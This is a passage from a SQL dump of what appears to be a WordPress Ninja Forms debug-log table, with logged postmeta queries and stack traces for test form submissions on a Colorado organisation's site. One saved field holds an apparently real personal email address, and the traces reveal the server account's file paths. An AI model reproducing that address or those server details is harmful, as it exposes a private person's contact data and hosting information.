162680',NULL,NULL),(8,4,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(9,5,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162680, \'_field_303\', \'testing1\')',NULL,NULL),(10,5,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(11,6,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_304\' AND post_id = 162680',NULL,NULL),(12,6,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(13,7,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162680, \'_field_304\', \'choll.03@comcast.net\')',NULL,NULL),(14,7,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(15,8,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_306\' AND post_id = 162680',NULL,NULL),(16,8,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(17,9,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162680, \'_field_306\', \'This Test\')',NULL,NULL),(18,9,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(19,10,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_307\' AND post_id = 162680',NULL,NULL),(20,10,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(21,11,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162680, \'_field_307\', \'Youth and Fam test message.\')',NULL,NULL),(22,11,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(23,12,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_302\' AND post_id = 162773',NULL,NULL),(24,12,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(25,13,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162773, \'_field_302\', \'Test 2\')',NULL,NULL),(26,13,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"